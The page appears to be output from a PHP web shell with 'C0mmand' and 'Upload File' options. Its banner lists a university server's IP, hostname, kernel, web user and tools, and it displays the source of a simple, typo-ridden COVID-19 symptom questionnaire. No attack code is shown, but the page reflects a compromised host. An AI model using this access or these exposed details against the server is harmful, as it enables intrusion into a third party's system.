Server IP : 172.16.15.8 / Your IP : 3.133.145.17 Web Server : Apache System : Linux zeus.vwu.edu 4.18.0-553.27.1.el8_10.x86_64 #1 SMP Wed Nov 6 14:29:02 UTC 2024 x86_64 User : apache ( 48) PHP Version : 7.2.24 Disable Function : NONE MySQL : OFF | cURL : ON | WGET : ON | Perl : ON | Python : ON Directory (0755) : /home/jesimmons/public_html/ |
[ Home ] | [ C0mmand ] | [ Upload File ] |
---|
<?php session_start(); ?> <FONT color=white size=4> <center> <STYLE> body { background-image: url('FPBACKGROUND.jpg'); background-repeat: no-repeat; background-size: 100% 100%; } </STYLE> <H2> Symptoms Questionaire </h2> </center> <HR> <?php $a1=$_POST['q1']; $a2=$_POST['q2']; $a3=$_POST['q3']; $a4=$_POST['q4']; $a5=$_POST['q5']; $a6=$_POST['q6']; $symp=0; if ($a1 == "a") { print "Do you have a fever: Yes<P>"; $symp+=1; } else { print "Do you have a fever: No<P>"; } if($a2== "a2") { print "Do you have a runny nose: Yes<P>"; } else { print "Do you have a runny nose: No<P>"; } if ($a3== "a3") { print "Do you have a cough: Yes<P>"; $symp+=1; } else { print "Do you have a caugh: No<P>"; } if($a4=="a4") { print "Do you have a soar throat: Yes<P>"; } else { print "Do you have a soar throat: No<P>"; } if($a5=="a5") { print "Do you sneeze more than often: Yes<P>"; } else { print "Do you sneeze more that often: No<P>"; } if ($a6=="a6") { print "Do you have Shortness of Breath: Yes<P>"; $symp+=1; } else { print "Do you have Shortness of Breath: No<P>"; } ?> <HR> <center> <?php if($symp==3) { print "You have selected 3 symptoms of COVID-19. Please contact your Health Care Phycician if your symptoms worsen. Also, STAY AWAY FROM PEOPLE!"; } if($symp==2) { print "You have selected 2 symptoms of COVID-19.Please contact your Health Care Phycician if your symptoms worsen. Also, STAY AWAY FROM PEOPLE!"; } if($symp==1) { print "you have selected 1 symptom of COVID-19.Please contact your Health Care Phycician if your get more symptoms. Also, STAY AWAY FROM PEOPLE!"; } if($symp==0) { print "You have selected 0 symptoms of COVID-19. You should be COVID-19 free but, if you have any questions please contact your Health Care Physician!"; } ?> </center> </FONT>